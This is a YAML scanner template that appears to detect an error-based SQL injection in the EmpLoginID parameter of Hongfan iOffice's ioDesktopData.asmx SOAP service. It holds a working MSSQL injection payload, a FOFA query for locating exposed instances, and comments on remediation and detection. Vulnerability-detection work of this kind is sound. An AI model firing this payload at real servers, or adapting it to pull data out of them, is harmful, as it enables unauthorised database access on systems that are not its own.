漏洞描述
fofa: (app="红帆-ioffice" || app="红帆-HFOffice")
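# Detection template for a SQL injection in the EmpLoginID parameter of the
# GetDepSchedule SOAP operation served by ioDesktopData.asmx (Hongfan iOffice).
# The probe only evaluates SELECT expressions: it asks the database for the MD5
# of a random number and checks that the hash is echoed back in the response.
#
# Layout note: nesting is restored here. With every line at column 0 the two
# `expression` keys collide and the `body: |` block scalar has no content.
#
# Remediation: bind EmpLoginID as a query parameter instead of concatenating it
# into SQL, stop returning database error text to clients, and restrict who can
# reach /iOffice/prg/set/wss/. Install the vendor's fixed build if available.
# Detection: review web/WAF logs for POSTs to this path whose EmpLoginID holds
# quotes or SQL keywords, especially when the server answered with HTTP 500.
id: hongfan-iodesktopdata-sqli

info:
  name: 红帆iOffice ioDesktopData.asmx接口SQL注入
  author: zan8in
  severity: high
  # Author's claim that the check was confirmed on a live target; the page
  # gives no affected or fixed version to verify it against.
  verified: true
  description: |-
    fofa: (app="红帆-ioffice" || app="红帆-HFOffice")
  tags: hongfan,sqli
  created: 2024/03/05

set:
  # Fresh six-digit value per run, so a static or cached page cannot satisfy
  # the match by accident.
  randomInt: randomInt(100000, 999999)

rules:
  r0:
    request:
      # No cookie or credential header is sent, so a match also indicates the
      # operation answers without an authenticated session.
      method: POST
      path: /iOffice/prg/set/wss/ioDesktopData.asmx
      headers:
        Content-Type: text/xml;charset=UTF-8
      # hashbytes() and sys.fn_varbintohexstr() are SQL Server functions, so
      # the check presumes an MSSQL backend. The hash is wrapped in fixed
      # CHAR() marker strings and surfaces through a database error message.
      body: |
        <soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
        <soap:Header/>
        <soap:Body>
        <tem:GetDepSchedule>
        <!--type: string-->
        <tem:EmpLoginID>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(select sys.fn_varbintohexstr(hashbytes('md5','{{randomInt}}')))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</tem:EmpLoginID>
        </tem:GetDepSchedule>
        </soap:Body>
        </soap:Envelope>
    # Rule-level match: HTTP 500 whose body contains the MD5 of randomInt.
    # This depends on the server returning database error text. A host that
    # hides errors, or a proxy that rewrites the 500, produces no match, so a
    # negative result does not prove the parameter is safely bound.
    expression: response.status == 500 && response.body.bcontains(bytes(md5(string(randomInt))))

# Template-level verdict: the finding is reported when rule r0 matches.
expression: r0()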